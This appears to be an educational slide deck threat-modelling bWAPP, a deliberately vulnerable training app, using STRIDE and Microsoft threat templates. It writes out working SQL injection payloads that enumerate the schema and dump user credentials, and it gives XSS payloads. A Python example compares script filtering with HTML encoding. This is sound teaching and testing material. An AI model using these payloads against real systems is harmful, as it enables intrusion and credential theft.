
Threat Model For bWAPP

By Dr. Anil Nandgaonkar
Mr. Jayesh Shinde
What is a Threat?

A threat is described by:
• An agent (the threat actor)
• The asset under attack
• The component that is attacked
• The attack vector used
What is a Threat Model

• Depiction of:
  • The system's attack surface
  • The threat agents who can attack the system
  • The assets those threats may compromise
• Some threat models also leverage risk management practices:
  • Estimate the probability of an attack
  • Weigh the impact of a successful attack
Who Benefits from Threat Modelling

Threat modelling provides different benefits to the project stakeholders depending on their role and responsibility:
• Architects
• Developers
• Security Testers
• Project Managers
• Business Managers
• Information Risk Officers
OWASP Threat Risk Modeling

Step 1: Identify Security Objectives
• Tactical security assessments
  • Identification of security flaws, the threats that can exploit them, and the mitigations
• Secure architecture reviews
  • Requirements, decomposition, threat mapping, threat response and mitigations
  • Threats and countermeasures, risk mitigation strategy
• Application risk management
  • Technical risk and business risk
  • Risk mitigation strategy: mitigate, transfer, or accept the risk
Step 2: Application Overview

Step 3: Decompose the Application
• Objective: understand the application and how it interacts with external entities
  • Create use cases
  • Identify entry points
  • Identify assets
• Outcome: data flow diagrams (DFDs) for the application that show the different paths through the system and highlight the privilege boundaries
Understanding the Application: Data Flow Diagrams
STRIDE

S  Spoofing
   Can an attacker gain access using a false identity?
T  Tampering
   Can an attacker modify data as it flows through the application?
R  Repudiation
   If an attacker denies doing something, can we prove they did it?
I  Information disclosure
   Can an attacker gain access to private data, or data whose disclosure causes harm?
D  Denial of service
   Can an attacker crash the system or reduce its availability?
E  Elevation of privilege
   Can an attacker gain privileges they were not granted, for example act as an administrator?
bWAPP (buggy Web Application)

• bWAPP, or buggy web application, is a free and open source deliberately insecure web application.
• It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.
• bWAPP prepares one to conduct successful penetration testing and ethical hacking projects.
• The application has more than 70 vulnerabilities, for example SQL injection, Cross-Site Scripting (XSS) and Denial of Service (DoS).
• bWAPP is a PHP application that uses a MySQL database.
• It can be hosted on Linux, Windows and Mac with Apache/IIS and MySQL. It can also be installed with WAMP or XAMPP.
Microsoft Threat Reporting Template

Field                Description
ID                   Unique ID number of the threat
Name                 Brief name of the threat
Description          Detailed description of the threat and its importance
STRIDE               How can we classify this threat?
Mitigated            Is the application safe from this threat?
Known Mitigation     How can we protect against the threat?
Investigation Notes  What do we know about this threat so far?
Entry Points         What possible means does an adversary have?
Assets               What assets could be damaged?
Threat Tree          How can we visualize the threat? (Optional)
Threat Description: SQL Injection

ID                   1
Name                 Search Movies
Description          An adversary injects SQL commands through a request into the application to circumvent the search process.
STRIDE               Information Disclosure
Mitigated            no
Known Mitigation     (not recorded)
Investigation Notes  The database calls in the application were reviewed; string concatenation is used to build the search query.
Entry Points         1.1 Search page
Assets               1.2 Backend database
Threat Tree          Yes
Threat Trees

SQL Injection threat tree (root: availability of information)

  Obtain movie information by search query
    AND
    Information disclosure: attacker uses the SQL injection technique via the GET method
    Information disclosure: attacker uses the SQL injection technique via the POST method
Exploiting the search query (SQL Injection (GET/Search), sqli_1.php)

Note: MySQL only treats -- as a comment when whitespace follows it; the trailing "-" in "-- -" keeps that space from being trimmed from the URL.

1) Find the number of columns: raise the ORDER BY index until the query errors
   http://localhost/bWAPP/bWAPP/sqli_1.php?title=1' order by 1-- -
   http://localhost/bWAPP/bWAPP/sqli_1.php?title=1' order by 8-- -
   The first index that errors is one more than the column count; the payloads below use 7 columns.
2) Confirm the column count with UNION SELECT
   http://localhost/bWAPP/bWAPP/sqli_1.php?title=1' union select 1,2,3,4,5,6,7-- -
3) Retrieve the name of the database (bWAPP)
   http://localhost/bWAPP/bWAPP/sqli_1.php?title=1' union select 1,2,3,4,database(),6,7-- -
4) Retrieve the MySQL version
   http://localhost/bWAPP/bWAPP/sqli_1.php?title=1' union select 1,2,3,4,version(),6,7-- -
5) Retrieve the table names in the bWAPP database
   ' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where 1=0 or 1=1-- -
6) Retrieve the column names of the users table
   ' and 1=0 union all select 1,table_name,column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users'-- -
7) Dump the credentials
   m' union all select 1,login,password,secret,5,6,7 from users-- -
8) The password column holds unsalted SHA-1 hashes, which can be looked up, e.g. at
   https://hashkiller.co.uk/sha1-decrypter.aspx
Cross-Site Scripting (XSS)

• Cross-Site Scripting, or XSS, occurs when an attacker injects a browser-side script into a web application
• Cause: insufficient validation (and encoding) of user-supplied data
• Dangerous when it is stored permanently!
• XSS can lead to
  • Website defacement
  • Phishing / session hijacking
  • Client-side exploitation
• Types of XSS flaws
  • Reflected XSS
  • Stored XSS
Threat Description: Cross-Site Scripting (XSS)

ID                   2
Name                 Login Page
Description          An adversary injects malicious JavaScript into the login page so that it runs in the browser when a user logs in.
STRIDE               Tampering with data; Information Disclosure
Mitigated            no
Known Mitigation     HTML (output) encoding; script filtering
Investigation Notes  The page accepts JavaScript code in its input fields and reflects it into the HTML, where it executes when the user tries to log in.
Entry Points         Form fields whose values are reflected into the HTML (a script tag in the input)
Assets               Web page
Threat Trees

XSS threat tree (root: integrity breach)

  Modifying the code in the web application
    AND
    Tampering with data / information disclosure: attacker uses malicious JavaScript code in the login page via reflected XSS
    Tampering with data / information disclosure: attacker uses malicious JavaScript code in the login page via stored XSS
Cross Site Scripting in bWAPP

XSS - Reflected (GET)
• Payload: <a href="javascript:alert('xss')">Click ME</a>
• Inject the above link into the first name / last name field so that it is reflected into the HTML, tampering with the page's code.
• Clicking the "Click ME" link pops the alert message on the screen.

XSS - Reflected (GET): HTML source view
• The reflected payload alters the HTML of the page; tampering with the source breaches the integrity of the web application.

  <div id="main">
  <h1>XSS - Reflected (GET)</h1>
  <p>Enter your first and last name:</p>
  <form action="/bWAPP/bWAPP/xss_get.php" method="GET">
  <p><label for="firstname">First name:</label><br />
  <input type="text" id="firstname" name="firstname"></p>
  <p><label for="lastname">Last name:</label><br />
  <input type="text" id="lastname" name="lastname"></p>
  <button type="submit" name="form" value="submit">Go</button>
  </form> <br />
  Welcome <a href="javascript:alert('xss')">Click ME</a> <a href="javascript:alert('xss')">Click ME</a>
  </div>
XSS - Stored (blog)
• Stored XSS (or persistent XSS) is the most dangerous type of XSS. The attacker injects a script (payload) that is permanently stored (persisted) on the vulnerable site.
• The malicious code is executed every time a browser visits an "infected" page, so with only one attack the attacker can exploit many users.
• The malicious script is inserted in a comment field on a blog or in a forum post.
• If you log in and visit this page from another browser, you will see that the alert box still appears, because the payload is saved in the database.

Check whether the field is vulnerable
• To test whether the input field is vulnerable, inject this script:
  <script>alert('XSS')</script>
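The reflected (GET) and stored (blog) cases above share one root cause: user text is pasted into the HTML unchanged. The following added example (not bWAPP's code; the render_* and has_raw_markup names are this example's own) takes the page's two payloads and runs them through the vulnerable "Welcome firstname lastname" output, through a naive script filter, and through HTML encoding, which are the two mitigations named in the threat table. It shows why a blocklist that only strips <script> tags is not enough: the reflected payload carries its JavaScript in an href attribute and passes straight through, while output encoding neutralises both payloads without losing the user's text.

```python
"""Reflected XSS output from xss_get.php: no mitigation vs. script filter vs. encoding.

Added example; the two payloads are the ones used on the page.
"""
import html
import re

PAYLOAD_LINK = "<a href=\"javascript:alert('xss')\">Click ME</a>"   # reflected (GET) payload
PAYLOAD_SCRIPT = "<script>alert('XSS')</script>"                  # stored (blog) probe

_SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)
_RAW_TAG = re.compile(r"<[a-zA-Z/!]")   # start of any tag the browser would parse


def render_unsafe(firstname: str, lastname: str) -> str:
    """What the page's HTML source shows: both fields pasted straight into the markup."""
    return f"Welcome {firstname} {lastname}"


def render_script_filter(firstname: str, lastname: str) -> str:
    """'Script filtering' as a blocklist: removes <script> tags and nothing else."""
    return f"Welcome {_SCRIPT_TAG.sub('', firstname)} {_SCRIPT_TAG.sub('', lastname)}"


def render_encoded(firstname: str, lastname: str) -> str:
    """'HTML encoding': <, >, &, ' and " become entities, so the browser renders
    the text instead of parsing it as markup."""
    return f"Welcome {html.escape(firstname, quote=True)} {html.escape(lastname, quote=True)}"


def has_raw_markup(rendered: str) -> bool:
    """Detector: does any tag reach the browser unencoded?"""
    return _RAW_TAG.search(rendered) is not None


if __name__ == "__main__":
    for name, render in [("unsafe", render_unsafe),
                         ("script filter", render_script_filter),
                         ("html encoding", render_encoded)]:
        for payload in (PAYLOAD_LINK, PAYLOAD_SCRIPT):
            out = render(payload, "")
            verdict = "VULNERABLE" if has_raw_markup(out) else "ok"
            print(f"{name:14} {verdict:10} {out}")
```

Encoding is applied at the point where the value is written into the HTML, not at input time, because the same stored comment may later be emitted into a different context (an attribute, a JavaScript string) that needs a different encoding.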
Summary

• Without threat modelling, protecting yourself is like "shooting in the dark"
• You need expertise in understanding the most common attacks: read security bulletins
• Developers must learn and use secure coding practices
• Assume you are vulnerable, then prove you are not
